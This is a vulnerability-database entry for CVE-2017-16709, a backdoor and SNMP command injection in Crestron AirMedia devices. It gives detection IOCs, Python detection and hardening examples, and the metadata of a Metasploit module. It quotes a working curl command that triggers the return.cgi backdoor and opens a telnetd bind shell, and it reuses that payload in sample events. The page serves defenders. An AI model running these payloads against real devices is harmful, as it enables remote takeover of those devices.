CVE-2017-16709
Published 2018-07-11
Priority: P2 · 69 · CVSS 3.0: 7.2 (High) · CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Exploit: public (see Exploit-DB and Metasploit entries below) · EPSS: 71.96% (99.4th percentile)
Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allow remote authenticated administrators to execute arbitrary code via unspecified vectors.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crestron | airmedia_am-100_firmware | < 1.6.0 | 1.6.0 |
| crestron | airmedia_am-101_firmware | < 2.7.0 | 2.7.0 |
Detection & IOCs (extracted from sources)
Command:
curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "command=SetFlaghttphttp://192.168.88.253:1270||telnetd -l /bin/sh -b 0.0.0.0:1270|| whoamilol" --insecure https://192.168.88.250/cgi-bin/return.cgi
- Detect unauthenticated POST requests to /cgi-bin/return.cgi containing the string 'SetFlag' in the body, which is the backdoor trigger condition.
- Monitor SNMP SET operations targeting OID 1.3.6.1.4.1.3212.100.3.2.9.1.0 for values beginning with 'ftp://' followed by shell command injection patterns (e.g., '$(' or '||').
- Monitor SNMP SET operations targeting OID 1.3.6.1.4.1.3212.100.3.2.9.5.0 with Integer value 1, which triggers the firmware upgrade and with it the injected command.
- Alert on new listening ports and inbound connections on non-standard ports such as 1270 on Crestron AM-100/AM-101 devices: the return.cgi payload above spawns telnetd as a bind shell (`telnetd -l /bin/sh -b 0.0.0.0:1270`), so the indicator is an attacker connecting in to the device, not the device connecting out.
- Check SNMP sysDescr (OID 1.3.6.1.2.1.1.1.0) for 'Crestron Electronics AM-100' or 'Crestron Electronics AM-101' to identify vulnerable devices on the network.
- The exploit payload is padded to exactly 255 bytes in the SNMP OctetString for camFWUpgradeFTPURL; anomalous 255-byte SNMP SET values on this OID are a strong indicator of exploitation.
- The Metasploit module uses 'linux/armle/meterpreter_reverse_tcp' as the default payload; detect ARMLE Meterpreter reverse TCP connections originating from Crestron AM-100/AM-101 devices.
- A valid SNMP read-write community string is required to exploit the SNMP injection vector; the module defaults to 'private'. Changing or restricting SNMP community strings limits exploitability.
- The backdoor in return.cgi was silently removed in AM-100 firmware 1.6.0.2 with no public documentation; devices on earlier firmware remain vulnerable to unauthenticated exploitation.
- AM-100 and AM-101 are considered EOL with no fix available for the SNMP injection; the Metasploit check method marks them unconditionally vulnerable regardless of firmware version.
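The IOCs above as detection logic, run over constructed sample events. This is an added example, not a rule from the page's sources or from Metasploit. The event dictionaries and their field names, the IP addresses, the benign firmware URL and the injected URL are assumptions; the HTTP sample body is the curl payload quoted above. The `scan` function also correlates the SNMP SET on camFWUpgradeFTPURL with the following upgrade trigger from the same source, which is the full exploit sequence and a far stronger signal than either SET alone.

```python
"""Detection logic for the CVE-2017-16709 IOCs, run over constructed sample events."""
import re
from collections import defaultdict

# OIDs named in the IOCs above (AwindInc enterprise arc 3212)
OID_FW_URL = "1.3.6.1.4.1.3212.100.3.2.9.1.0"      # camFWUpgradeFTPURL (OctetString)
OID_FW_TRIGGER = "1.3.6.1.4.1.3212.100.3.2.9.5.0"  # Integer 1 starts the upgrade
OID_SYS_DESCR = "1.3.6.1.2.1.1.1.0"                # sysDescr, for device identification
AWIND_SYSDESCR = ("Crestron Electronics AM-100", "Crestron Electronics AM-101")

# Shell metacharacters that turn an FTP URL into a command line for ftpfw.sh
SHELL_INJECTION = re.compile(r"\$\(|`|\|\||&&|;|\n")


def http_rule(ev):
    """Backdoor trigger: POST to /cgi-bin/return.cgi with 'SetFlag' in the body."""
    if ev["method"] != "POST" or ev["path"].split("?")[0] != "/cgi-bin/return.cgi":
        return None
    if "SetFlag" not in ev.get("body", ""):
        return None
    auth = "authenticated" if ev.get("authenticated") else "unauthenticated"
    return f"return.cgi SetFlag backdoor trigger ({auth})"


def snmp_rules(ev):
    """Names of the SNMP rules an event fires (SET operations only)."""
    hits = []
    if ev["pdu"] != "SET":
        return hits
    if ev["oid"] == OID_FW_URL:
        value = ev["value"]
        if value.startswith("ftp://") and SHELL_INJECTION.search(value):
            hits.append("camFWUpgradeFTPURL injection")
        if len(value.encode()) == 255:          # the module pads its payload to 255 bytes
            hits.append("camFWUpgradeFTPURL 255-byte value")
    elif ev["oid"] == OID_FW_TRIGGER and ev["value"] == 1:
        hits.append("firmware upgrade trigger")
    return hits


def is_awind_device(sys_descr):
    """Identify affected devices from the sysDescr string returned for OID_SYS_DESCR."""
    return any(tag in sys_descr for tag in AWIND_SYSDESCR)


def scan(events):
    """Run the rules over an event stream and correlate per (src, dst) pair:
    an injected URL SET followed by the upgrade trigger from the same source
    is the complete exploit sequence."""
    alerts = defaultdict(list)
    primed = set()   # pairs that have planted an injected URL
    for ev in events:
        key = (ev["src"], ev["dst"])
        if ev["proto"] == "http":
            hit = http_rule(ev)
            if hit:
                alerts[key].append(hit)
        elif ev["proto"] == "snmp":
            for hit in snmp_rules(ev):
                alerts[key].append(hit)
                if hit == "camFWUpgradeFTPURL injection":
                    primed.add(key)
                elif hit == "firmware upgrade trigger" and key in primed:
                    alerts[key].append("EXPLOIT SEQUENCE: injected URL then upgrade trigger")
    return dict(alerts)


# Constructed sample events (assumed shape; adapt field names to your own pipeline).
DEVICE, ATTACKER, ADMIN = "192.168.88.250", "192.168.88.253", "10.0.0.5"
INJECTED_URL = "ftp://192.168.88.253/fw||$(telnetd -l /bin/sh -b 0.0.0.0:1270)".ljust(255)
SAMPLE_EVENTS = [
    # the curl payload quoted above, sent without any session
    {"proto": "http", "src": ATTACKER, "dst": DEVICE, "method": "POST", "path": "/cgi-bin/return.cgi",
     "authenticated": False,
     "body": "command=SetFlaghttphttp://192.168.88.253:1270||telnetd -l /bin/sh -b 0.0.0.0:1270|| whoamilol"},
    {"proto": "snmp", "src": ADMIN, "dst": DEVICE, "pdu": "GET", "oid": OID_SYS_DESCR, "value": None},
    {"proto": "snmp", "src": ATTACKER, "dst": DEVICE, "pdu": "SET", "oid": OID_FW_URL, "value": INJECTED_URL},
    {"proto": "snmp", "src": ATTACKER, "dst": DEVICE, "pdu": "SET", "oid": OID_FW_TRIGGER, "value": 1},
    # an administrator staging a genuine image: no metacharacters, not padded
    {"proto": "snmp", "src": ADMIN, "dst": DEVICE, "pdu": "SET", "oid": OID_FW_URL,
     "value": "ftp://fw.corp.example/AM-100_1.6.0.bin"},
    {"proto": "snmp", "src": ADMIN, "dst": DEVICE, "pdu": "SET", "oid": OID_FW_TRIGGER, "value": 1},
]

if __name__ == "__main__":
    for pair, hits in scan(SAMPLE_EVENTS).items():
        print(pair, hits)
```

Running it prints the attacker pair with all five findings and the administrator pair with only the (legitimate) upgrade trigger; the trigger rule on its own is noisy on any site that upgrades firmware over SNMP, which is why the correlation step is there.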
CVSS provenance
NVD v3.0: 7.2 HIGH · CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 6.5 MEDIUM · AV:N/AC:L/Au:S/C:P/I:P/A:P
No detection rules found.
Exploit-DB (2019-09-05): AwindInc SNMP Service - Command Injection (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => "AwindInc SNMP Service Command Injection",
      'Description' => %q{
        This module exploits a vulnerability found in AwindInc and OEM'ed products where
        untrusted inputs are fed to ftpfw.sh system command, leading to command injection.

        A valid SNMP read-write community is required to exploit this vulnerability.

        The following devices are known to be affected by this issue:

        * Crestron Airmedia AM-100 <= version 1.5.0.4
        * Crestron Airmedia AM-101 <= version 2.5.0.12
        * Awind WiPG-1600w <= version 2.0.1.8
        * Awind WiPG-2000d <= version 2.1.6.2
        * Barco wePresent 2000 <= version 2.1.5.7
        * Newline Trucast 2 <= version 2.1.0.5
        * Newline Trucast 3 <= version 2.1.3.7
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Quentin Kaiser'
        ],
      'References'  =>
        [
          ['CVE', '2017-16709'],
          ['URL', 'https://github.com/QKaiser/awind-research'],
          ['URL', 'https://qkaiser.github.io/pen
Metasploit: AwindInc SNMP Service Command Injection
This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection. A valid SNMP read-write community is required to exploit this vulnerability. The following devices are known to be affected by this issue:
- Crestron Airmedia AM-100 <= version 1.5.0.4
- Crestron Airmedia AM-101 <= version 2.5.0.12
- Awind WiPG-1600w <= version 2.0.1.8
- Awind WiPG-2000d <= version 2.1.6.2
- Barco wePresent 2000 <= version 2.1.5.7
- Newline Trucast 2 <= version 2.1.0.5
- Newline Trucast 3 <= version 2.1.3.7
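The injection the module description refers to, modelled as an added example (this is not the firmware's ftpfw.sh, nor code from the Metasploit module): the SNMP-supplied firmware URL is spliced into a command line that a shell parses, so once the download step fails the attacker's `||` branch runs. Beside it are the two fixes a practitioner would want, an allow-list check on the value capped at the 255-byte OctetString length the page mentions, and an argv form that keeps the shell out of the path entirely. `cat` stands in for the FTP fetch, the URLs are constructed, and it needs a POSIX sh.

```python
"""Command-injection pattern behind CVE-2017-16709, modelled in Python (added example)."""
import re
import subprocess

MAX_OCTETS = 255  # OctetString length the exploit pads to; also a sane cap for a URL


def fetch_vulnerable(url):
    """The vulnerable pattern: an attacker-controlled value (the camFWUpgradeFTPURL
    string) is interpolated into a command string that sh parses. 'cat' stands in
    for the FTP download; it fails on a URL, so an attacker's '|| cmd' branch runs."""
    proc = subprocess.run(["sh", "-c", f"cat {url}"], capture_output=True, text=True)
    return proc.stdout


def fetch_argv_only(url):
    """Argv form without validation: the whole URL is one argument, and '||'
    or '$(' are just bytes in it, so nothing is executed."""
    proc = subprocess.run(["cat", url], capture_output=True, text=True)
    return proc.stdout


# Allow-list for a firmware URL: ftp scheme, hostname or IPv4, optional port, safe path chars.
SAFE_FTP_URL = re.compile(r"\Aftp://[A-Za-z0-9.-]+(?::[0-9]{1,5})?/[A-Za-z0-9._/-]+\Z")


def is_accepted(url):
    """True when the value passes the allow-list and the length cap."""
    return len(url.encode()) <= MAX_OCTETS and SAFE_FTP_URL.match(url) is not None


def build_argv(url):
    """Hardened: reject anything outside the allow-list, then build an argv list
    so that no shell ever parses the value (belt and braces)."""
    if not is_accepted(url):
        raise ValueError(f"rejected firmware URL: {url!r}")
    return ["cat", url]


def fetch_hardened(url):
    proc = subprocess.run(build_argv(url), capture_output=True, text=True)
    return proc.stdout


# Constructed inputs: the payload uses the '||' pattern the IOCs describe, with a
# harmless echo in place of telnetd.
PAYLOAD = "ftp://192.168.88.253/fw||echo INJECTED"
BENIGN = "ftp://fw.corp.example/AM-100_1.6.0.bin"

if __name__ == "__main__":
    print("vulnerable :", repr(fetch_vulnerable(PAYLOAD)))   # 'INJECTED\n'
    print("argv only  :", repr(fetch_argv_only(PAYLOAD)))   # ''
    print("hardened   :", "accepted" if is_accepted(PAYLOAD) else "rejected")
    print("hardened   :", build_argv(BENIGN))
```

On the real device the mitigation that is actually available to an operator is the one the IOC list names: the SNMP vector needs the read-write community, so changing it from the default and filtering SNMP to management hosts removes the attacker's ability to write camFWUpgradeFTPURL at all.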
References:
- http://packetstormsecurity.com/files/154362/AwindInc-SNMP-Service-Command-Injection.html
- https://support.crestron.com/app/answers/answer_view/a_id/5471/~/the-latest-details-from-crestron-on-security-and-safety-on-the-internet#CVE-2017-16709
- https://www.tenable.com/security/research/tra-2019-20